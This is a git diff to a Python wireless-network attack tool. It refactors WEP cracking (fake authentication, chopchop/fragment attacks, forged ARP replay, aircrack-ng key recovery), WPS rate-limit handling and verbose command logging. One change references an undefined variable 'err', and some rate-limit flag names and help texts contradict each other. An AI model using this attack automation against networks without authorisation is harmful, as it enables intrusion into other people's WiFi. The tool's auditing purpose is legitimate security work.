diff --git a/py/Aireplay.py b/py/Aireplay.py index 2a1db44..4972ff9 100644 --- a/py/Aireplay.py +++ b/py/Aireplay.py @@ -122,7 +122,7 @@ class Aireplay(object): if attack_type == WEPAttackType.fakeauth: cmd.extend(['-1', '0']) # Fake auth, no delay cmd.extend(['-a', target.bssid]) - cmd.extend(['-T', '1']) # Make 1 attemp + cmd.extend(['-T', '3']) # Make 3 attempts if target.essid_known: cmd.extend(['-e', target.essid]) # Do not specify client MAC address, diff --git a/py/Airodump.py b/py/Airodump.py index f45b344..f679506 100644 --- a/py/Airodump.py +++ b/py/Airodump.py @@ -13,7 +13,7 @@ class Airodump(object): def __init__(self, interface=None, channel=None, encryption=None,\ wps=False, target_bssid=None, output_file_prefix='airodump',\ - ivs_only=False): + ivs_only=False, skip_wash=False): ''' Sets up airodump arguments, doesn't start process yet ''' @@ -39,6 +39,7 @@ class Airodump(object): self.target_bssid = target_bssid self.output_file_prefix = output_file_prefix self.ivs_only = ivs_only + self.skip_wash = skip_wash def __enter__(self): @@ -133,8 +134,9 @@ class Airodump(object): targets = Airodump.get_targets_from_csv(csv_filename) # Check targets for WPS - capfile = csv_filename[:-3] + 'cap' - Wash.check_for_wps_and_update_targets(capfile, targets) + if not self.skip_wash: + capfile = csv_filename[:-3] + 'cap' + Wash.check_for_wps_and_update_targets(capfile, targets) # Filter targets based on encryption targets = Airodump.filter_targets(targets) @@ -175,7 +177,11 @@ class Airodump(object): if hit_clients: # The current row corresponds to a "Client" (computer) - client = Client(row) + try: + client = Client(row) + except IndexError: + # Skip if we can't parse the client row + continue if 'not associated' in client.bssid: # Ignore unassociated clients diff --git a/py/Arguments.py b/py/Arguments.py index cf8f864..6fb9351 100644 --- a/py/Arguments.py +++ b/py/Arguments.py @@ -212,8 +212,8 @@ class Arguments(object): % Configuration.wps_timeout_threshold) wps.add_argument('--ignore-ratelimit', action='store_false', - dest='wps_ignore_rate_limit', - help=Color.s('Continues attack if WPS is rate-limited (default: {G}off{W})')) + dest='wps_skip_rate_limit', + help=Color.s('Ignores attack if WPS is rate-limited (default: {G}on{W})')) # Commands commands = parser.add_argument_group('COMMANDS') diff --git a/py/AttackWEP.py b/py/AttackWEP.py index d3fd170..0c98167 100644 --- a/py/AttackWEP.py +++ b/py/AttackWEP.py @@ -29,175 +29,201 @@ class AttackWEP(Attack): Including airodump-ng starting, cracking, etc. Returns: True if attack is succesful, false otherwise ''' - # First, start Airodump process - with Airodump(channel=self.target.channel, - target_bssid=self.target.bssid, - ivs_only=True, # Only capture IVs packets - output_file_prefix='wep') as airodump: - Color.clear_line() - Color.p('\r{+} {O}waiting{W} for target to appear...') - airodump_target = self.wait_for_target(airodump) + aircrack = None # Aircrack process, not started yet - if self.fake_auth(): - # We successfully authenticated! - # Use our interface's MAC address for the attacks. - client_mac = Interface.get_mac() - elif len(airodump_target.clients) == 0: - # There are no associated clients. Warn user. - Color.pl('{!} {O}there are no associated clients{W}') - Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' + - ' without fake-authentication or associated clients{W}') - client_mac = None - else: - client_mac = airodump_target.clients[0].station + for (attack_index, attack_name) in enumerate(Configuration.wep_attacks): + # BIG try-catch to capture ctrl+c + try: + # Start Airodump process + with Airodump(channel=self.target.channel, + target_bssid=self.target.bssid, + ivs_only=True, # Only capture IVs packets + skip_wash=True, # Don't check for WPS-compatibility + output_file_prefix='wep') as airodump: - aircrack = None # Aircrack process, not started yet - - for attack_name in Configuration.wep_attacks: - # Convert to WEPAttackType. - wep_attack_type = WEPAttackType(attack_name) - - replay_file = None - # Start Aireplay process. - aireplay = Aireplay(self.target, \ - wep_attack_type, \ - client_mac=client_mac, \ - replay_file=replay_file) - - time_unchanged_ivs = time.time() # Timestamp when IVs last changed - previous_ivs = 0 - - # Loop until attack completes. - while True: + Color.clear_line() + Color.p('\r{+} {O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) - Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) ' - % (attack_name, airodump_target.ivs)) - # Check if we cracked it. - if aircrack and aircrack.is_cracked(): - (hex_key, ascii_key) = aircrack.get_key_hex_ascii() - bssid = airodump_target.bssid - if airodump_target.essid_known: - essid = airodump_target.essid - else: - essid = None - Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' - % attack_name) - if aireplay: - aireplay.stop() - self.crack_result = CrackResultWEP(bssid, \ - essid, \ - hex_key, \ - ascii_key) - self.crack_result.dump() - self.success = True - return self.success + if self.fake_auth(): + # We successfully authenticated! + # Use our interface's MAC address for the attacks. + client_mac = Interface.get_mac() + elif len(airodump_target.clients) == 0: + # There are no associated clients. Warn user. + Color.pl('{!} {O}there are no associated clients{W}') + Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' + + ' without fake-authentication or associated clients{W}') + client_mac = None + else: + client_mac = airodump_target.clients[0].station - if aircrack and aircrack.is_running(): - # Aircrack is running in the background. - Color.p('and {C}cracking{W}') + # Convert to WEPAttackType. + wep_attack_type = WEPAttackType(attack_name) - # Check number of IVs, crack if necessary - if airodump_target.ivs > Configuration.wep_crack_at_ivs: - if not aircrack: - # Aircrack hasn't started yet. Start it. - ivs_file = airodump.find_files(endswith='.ivs')[0] - aircrack = Aircrack(ivs_file) + replay_file = None + # Start Aireplay process. + aireplay = Aireplay(self.target, \ + wep_attack_type, \ + client_mac=client_mac, \ + replay_file=replay_file) - elif not aircrack.is_running(): - # Aircrack stopped running. - Color.pl('\n{!} {O}aircrack stopped running!{W}') - ivs_file = airodump.find_files(endswith='.ivs')[0] - Color.pl('{+} {C}aircrack{W} stopped,' + - ' restarting {C}aircrack{W}') - aircrack = Aircrack(ivs_file) + time_unchanged_ivs = time.time() # Timestamp when IVs last changed + previous_ivs = 0 - elif aircrack.is_running() and \ - Configuration.wep_restart_aircrack > 0: - # Restart aircrack after X seconds - if aircrack.pid.running_time() > Configuration.wep_restart_aircrack: - aircrack.stop() + # Loop until attack completes. + + while True: + airodump_target = self.wait_for_target(airodump) + Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) ' + % (attack_name, airodump_target.ivs)) + + # Check if we cracked it. + if aircrack and aircrack.is_cracked(): + (hex_key, ascii_key) = aircrack.get_key_hex_ascii() + bssid = airodump_target.bssid + if airodump_target.essid_known: + essid = airodump_target.essid + else: + essid = None + Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' + % attack_name) + if aireplay: + aireplay.stop() + self.crack_result = CrackResultWEP(bssid, \ + essid, \ + hex_key, \ + ascii_key) + self.crack_result.dump() + self.success = True + return self.success + + if aircrack and aircrack.is_running(): + # Aircrack is running in the background. + Color.p('and {C}cracking{W}') + + # Check number of IVs, crack if necessary + if airodump_target.ivs > Configuration.wep_crack_at_ivs: + if not aircrack: + # Aircrack hasn't started yet. Start it. ivs_file = airodump.find_files(endswith='.ivs')[0] - Color.pl('\n{+} {C}aircrack{W} ran for more than' + - ' {C}%d{W} seconds, restarting' - % Configuration.wep_restart_aircrack) aircrack = Aircrack(ivs_file) + elif not aircrack.is_running(): + # Aircrack stopped running. + Color.pl('\n{!} {O}aircrack stopped running!{W}') + ivs_file = airodump.find_files(endswith='.ivs')[0] + Color.pl('{+} {C}aircrack{W} stopped,' + + ' restarting {C}aircrack{W}') + aircrack = Aircrack(ivs_file) - if not aireplay.is_running(): - # Some Aireplay attacks loop infinitely - if attack_name == 'chopchop' or attack_name == 'fragment': - # We expect these to stop once a .xor is created, - # or if the process failed. + elif aircrack.is_running() and \ + Configuration.wep_restart_aircrack > 0: + # Restart aircrack after X seconds + if aircrack.pid.running_time() > Configuration.wep_restart_aircrack: + aircrack.stop() + ivs_file = airodump.find_files(endswith='.ivs')[0] + Color.pl('\n{+} {C}aircrack{W} ran for more than' + + ' {C}%d{W} seconds, restarting' + % Configuration.wep_restart_aircrack) + aircrack = Aircrack(ivs_file) - replay_file = None - # Check for .xor file. - xor_file = Aireplay.get_xor() - if not xor_file: - # If .xor is not there, the process failed. - Color.pl('\n{!} {O}%s attack{R} did not generate' + - ' a .xor file{W}' % attack_name) - # XXX: For debugging - Color.pl('\noutput:\n') - Color.pl(aireplay.get_output()) - Color.pl('') - break + if not aireplay.is_running(): + # Some Aireplay attacks loop infinitely + if attack_name == 'chopchop' or attack_name == 'fragment': + # We expect these to stop once a .xor is created, + # or if the process failed. - # If .xor exists, run packetforge-ng to create .cap - Color.pl('\n{+} {C}%s attack{W}' % attack_name + - ' generated a {C}.xor file{W}, {G}forging...{W}') - forge_file = Aireplay.forge_packet(xor_file, - airodump_target.bssid, - client_mac) - if forge_file: - replay_file = forge_file - Color.pl('{+} {C}forged packet{W},' + - ' {G}replaying...{W}') - attack_name = 'forged arp replay' - aireplay = Aireplay(self.target, \ - 'forgedreplay', \ - client_mac=client_mac, \ - replay_file=replay_file) - continue + replay_file = None + + # Check for .xor file. + xor_file = Aireplay.get_xor() + if not xor_file: + # If .xor is not there, the process failed. + Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name + + ' a .xor file{W}') + # XXX: For debugging + Color.pl('\noutput:\n') + Color.pl(aireplay.get_output()) + Color.pl('') + break + + # If .xor exists, run packetforge-ng to create .cap + Color.pl('\n{+} {C}%s attack{W}' % attack_name + + ' generated a {C}.xor file{W}, {G}forging...{W}') + forge_file = Aireplay.forge_packet(xor_file, + airodump_target.bssid, + client_mac) + if forge_file: + replay_file = forge_file + Color.pl('{+} {C}forged packet{W},' + + ' {G}replaying...{W}') + attack_name = 'forged arp replay' + aireplay = Aireplay(self.target, \ + 'forgedreplay', \ + client_mac=client_mac, \ + replay_file=replay_file) + continue + else: + # Failed to forge packet. drop out + break else: - # Failed to forge packet. drop out - break - else: - Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}') - Color.pl('\naireplay.get_output():') - Color.pl(aireplay.get_output()) - break # Continue to other attacks + Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}') + Color.pl('\naireplay.get_output():') + Color.pl(aireplay.get_output()) + break # Continue to other attacks - # Check if IVs stopped flowing (same for > N seconds) - if airodump_target.ivs > previous_ivs: - time_unchanged_ivs = time.time() - elif Configuration.wep_restart_stale_ivs > 0 and \ - attack_name != 'chopchop' and \ - attack_name != 'fragment': - stale_seconds = time.time() - time_unchanged_ivs - if stale_seconds > Configuration.wep_restart_stale_ivs: - # No new IVs within threshold, restart aireplay - aireplay.stop() - Color.pl('\n{!} restarting {C}aireplay{W} after' + - ' {C}%d{W} seconds of no new IVs' - % stale_seconds) - aireplay = Aireplay(self.target, \ - wep_attack_type, \ - client_mac=client_mac) + # Check if IVs stopped flowing (same for > N seconds) + if airodump_target.ivs > previous_ivs: time_unchanged_ivs = time.time() - previous_ivs = airodump_target.ivs + elif Configuration.wep_restart_stale_ivs > 0 and \ + attack_name != 'chopchop' and \ + attack_name != 'fragment': + stale_seconds = time.time() - time_unchanged_ivs + if stale_seconds > Configuration.wep_restart_stale_ivs: + # No new IVs within threshold, restart aireplay + aireplay.stop() + Color.pl('\n{!} restarting {C}aireplay{W} after' + + ' {C}%d{W} seconds of no new IVs' + % stale_seconds) + aireplay = Aireplay(self.target, \ + wep_attack_type, \ + client_mac=client_mac) + time_unchanged_ivs = time.time() + previous_ivs = airodump_target.ivs - time.sleep(1) - continue - # End of big while loop - # End of for-each-attack-type loop - # End of with-airodump + time.sleep(1) + continue + # End of big while loop + # End of with-airodump + except KeyboardInterrupt: + if not self.user_wants_to_continue(attack_index): + self.success = False + return self.success + # End of big try-catch + # End of for-each-attack-type loop self.success = False return self.success + def user_wants_to_continue(self, attack_index): + ''' Asks user if attacks should continue using remaining methods ''' + Color.pl('\n{!} {O}interrupted{W}\n') + + if attack_index + 1 >= len(Configuration.wep_attacks): + # No more WEP attacks to perform. + return False + + attacks_remaining = Configuration.wep_attacks[attack_index + 1:] + Color.pl("{+} {G}%d{W} attacks remain ({C}%s{W})" % (len(attacks_remaining), ', '.join(attacks_remaining))) + prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' + + ' or {R}s{W} to {R}stop{W}: ') + if raw_input(prompt).lower().startswith('s'): + return False + else: + return True def fake_auth(self): ''' diff --git a/py/AttackWPA.py b/py/AttackWPA.py index 6234632..03cfb88 100644 --- a/py/AttackWPA.py +++ b/py/AttackWPA.py @@ -33,6 +33,7 @@ class AttackWPA(Attack): # First, start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, + skip_wash=True, output_file_prefix='wpa') as airodump: Color.clear_line() diff --git a/py/AttackWPS.py b/py/AttackWPS.py index a05a615..d613876 100644 --- a/py/AttackWPS.py +++ b/py/AttackWPS.py @@ -124,11 +124,8 @@ class AttackWPS(Attack): elif 'Detected AP rate limiting,' in stdout_last_line: if Configuration.wps_skip_rate_limit: Color.pl('{R}failed: {O}hit WPS rate-limit{W}') - # TODO: Argument for --ignore-rate-limit - ''' - Color.pl('{!} {O}use {R}--ignore-rate-limit{O} to ignore' + - ' this kind of failure in the future') - ''' + Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' + + ' this kind of failure in the future{W}') break step = '({C}step -/8{W}) waiting for AP rate limit' @@ -261,9 +258,11 @@ class AttackWPS(Attack): if 'Detected AP rate limiting' in out: state = '{R}rate-limited{W}' - if not Configuration.wps_skip_rate_limit: + if Configuration.wps_skip_rate_limit: Color.pl(state) Color.pl('{!} {R}hit rate limit, stopping{W}\n') + Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' + + ' this kind of failure in the future{W}') break if 'WARNING: Failed to associate with' in out: diff --git a/py/Color.py b/py/Color.py index 89d2fb4..15eba8f 100644 --- a/py/Color.py +++ b/py/Color.py @@ -48,6 +48,14 @@ class Color(object): Color.p('%s\n' % text) Color.last_sameline_length = 0 + @staticmethod + def pe(text): + ''' + Prints text using colored format with leading and trailing new line to STDERR. + ''' + sys.stderr.write(Color.s('%s\n' % text)) + Color.last_sameline_length = 0 + @staticmethod def s(text): ''' Returns colored string ''' diff --git a/py/Configuration.py b/py/Configuration.py index 1133959..daa8975 100644 --- a/py/Configuration.py +++ b/py/Configuration.py @@ -193,7 +193,7 @@ class Configuration(object): if args.wps_timeout_threshold: Configuration.wps_timeout_threshold = args.wps_timeout_threshold Color.pl('{+} {C}option:{W} will stop WPS attack after {G}%d timeouts{W}' % args.wps_timeout_threshold) - if args.wps_ignore_rate_limit == False: + if args.wps_skip_rate_limit == False: Configuration.wps_skip_rate_limit = False Color.pl('{+} {C}option:{W} will {G}continue{W} WPS attacks when rate-limited') diff --git a/py/Process.py b/py/Process.py index ec92cbd..82f415b 100644 --- a/py/Process.py +++ b/py/Process.py @@ -1,5 +1,8 @@ #!/usr/bin/python +from Configuration import Configuration +from Color import Color + from subprocess import Popen, call, PIPE import time @@ -20,20 +23,35 @@ class Process(object): ''' if type(command) != str or ' ' in command or shell: shell = True + if Configuration.verbose > 1: + Color.pe("\n {C}[?] {W} Executing (Shell): {B}%s{W}" % command) else: shell = False + if Configuration.verbose > 1: + Color.pe("\n {C}[?]{W} Executing: {B}%s{W}" % command) + pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell) pid.wait() - return pid.communicate() + (stdout, stderr) = pid.communicate() + + if Configuration.verbose > 1 and stdout.strip() != '': + Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(stdout.split('\n'))) + if Configuration.verbose > 1 and stderr.strip() != '': + Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(stderr.split('\n'))) + + return (stdout, stderr) @staticmethod def exists(program): ''' Checks if program is installed on this system ''' p = Process(['which', program]) - if p.stdout().strip() == '' and p.stderr().strip() == '': - return False - return True + stdout = p.stdout().strip() + stderr = p.stderr().strip() + if stdout == '' and err == '': + return False + + return True def __init__(self, command, devnull=False, stdout=PIPE, stderr=PIPE, cwd=None): ''' Starts executing command ''' @@ -44,6 +62,9 @@ class Process(object): self.command = command + if Configuration.verbose > 1: + Color.pe("\n {C}[?] {W} Executing: {B}%s{W}" % ' '.join(command)) + self.out = None self.err = None if devnull: @@ -68,11 +89,15 @@ class Process(object): def stdout(self): ''' Waits for process to finish, returns stdout output ''' self.get_output() + if Configuration.verbose > 1 and self.out.strip() != '': + Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(self.out.split('\n'))) return self.out def stderr(self): ''' Waits for process to finish, returns stderr output ''' self.get_output() + if Configuration.verbose > 1 and self.err.strip() != '': + Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(self.err.split('\n'))) return self.err def get_output(self): diff --git a/py/Scanner.py b/py/Scanner.py index 16e1fec..4471601 100644 --- a/py/Scanner.py +++ b/py/Scanner.py @@ -93,18 +93,20 @@ class Scanner(object): if self.previous_target_count > 0: # We need to "overwrite" the previous list of targets. - if self.previous_target_count > len(self.targets) or \ - Scanner.get_terminal_height() < self.previous_target_count + 3: - # Either: - # 1) We have less targets than before, so we can't overwrite the previous list - # 2) The terminal can't display the targets without scrolling. - # Clear the screen. - from Process import Process - Process.call('clear') - else: - # We can fit the targets in the terminal without scrolling - # "Move" cursor up so we will print over the previous list - Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count)) + if Configuration.verbose <= 1: + # Don't clear screen buffer in verbose mode. + if self.previous_target_count > len(self.targets) or \ + Scanner.get_terminal_height() < self.previous_target_count + 3: + # Either: + # 1) We have less targets than before, so we can't overwrite the previous list + # 2) The terminal can't display the targets without scrolling. + # Clear the screen. + from Process import Process + Process.call('clear') + else: + # We can fit the targets in the terminal without scrolling + # "Move" cursor up so we will print over the previous list + Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count)) self.previous_target_count = len(self.targets)